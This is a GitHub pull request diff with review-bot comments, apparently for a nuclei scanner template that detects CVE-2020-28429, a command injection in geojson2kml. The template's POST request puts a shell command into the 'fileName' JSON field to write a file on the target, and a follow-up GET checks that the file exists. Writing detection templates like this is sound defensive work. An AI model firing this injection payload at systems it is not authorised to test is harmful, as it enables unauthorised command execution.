Added CVE-2020-28429 by eeche #10489

Merged: 7 commits, Aug 29, 2024
updated matchers & variable
ritikchaddha authored Aug 29, 2024
commit 150bf59192af04f7bb15923a5e13269ace2d44ab
38 changes: 23 additions & 15 deletions http/cves/2020/CVE-2020-28429.yaml
Expand Up @@ -2,20 +2,28 @@

info:
name: geojson2kml - Command Injection
author: eeche, chae1xx1os, persona-twotwo, soonghee2
author: eeche,chae1xx1os,persona-twotwo,soonghee2
severity: critical
description: Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: Do not use geojson2kml. There is no fixed version for geojson2kml.
description: |
Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
remediation: |
Do not use geojson2kml. There is no fixed version for geojson2kml.
reference:

GitHub Actions / lint annotation on line 13 of http/cves/2020/CVE-2020-28429.yaml: 13:13 [trailing-spaces] trailing spaces
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
- https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
- https://github.com/advisories/GHSA-w83x-fp72-p9qc
- https://nvd.nist.gov/vuln/detail/CVE-2020-28429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-28429
tags: cve, cve2020, command-injection, geojson2kml, file-upload, web
metadata:
max-request: 2
tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
filename: '{{rand_base(6)}}'

http:
- raw:
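Review bot: the `description` still says `hacked.txt` is created, but this commit moves the dropped file to the randomized `filename` variable (`'{{rand_base(6)}}'`), so the description should be updated to match; the lint failure flagged at 13:13 (`[trailing-spaces]` on the `reference:` line) also needs the trailing whitespace removed before merge. The tag change from `command-injection, web` to `rce, intrusive` is appropriate because the template writes a file on the target, and `max-request: 2` agrees with the two raw requests.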
Expand All @@ -25,7 +33,7 @@
Content-Type: application/json

{
"fileName": "& echo \"{{randstr}}\" > hacked.txt && ls",
"fileName": "& echo \"{{randstr}}\" > {(unknown)}.txt && ls",
"geoJsonData": {
"type": "FeatureCollection",
"features": [
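Review bot: the placeholder in the `fileName` payload renders here as `{(unknown)}.txt`; confirm the committed line references the `filename` variable declared under `variables:` (i.e. `{{filename}}`), otherwise the file that is written and the later `GET /file/...` path will not agree. The trailing `&& ls` adds nothing to the detection, which depends only on the file being created and then readable.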
Expand All @@ -44,21 +52,21 @@
}

- |
GET /file/hacked.txt HTTP/1.1
GET /file/{(unknown)}.txt HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
part: body_2
words:
- "{{randstr}}"

- type: word
part: header
part: header_2
words:
- "text/html"
- "text/html"

- type: status
status:
- 200
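Review bot: the `body_2` and `header_2` parts only resolve when `req-condition: true` is set on the http block, which this hunk does not show; without it nuclei evaluates each response on its own and the suffixed parts do not match. The status matcher moved to the end is still unscoped (`- 200` with no request-specific form), and under `matchers-condition: and` the `text/html` header check is a weak signal for a `.txt` fetch; the `{{randstr}}` body match is the real indicator and relies on `randstr` resolving to the same value in the POST and the GET.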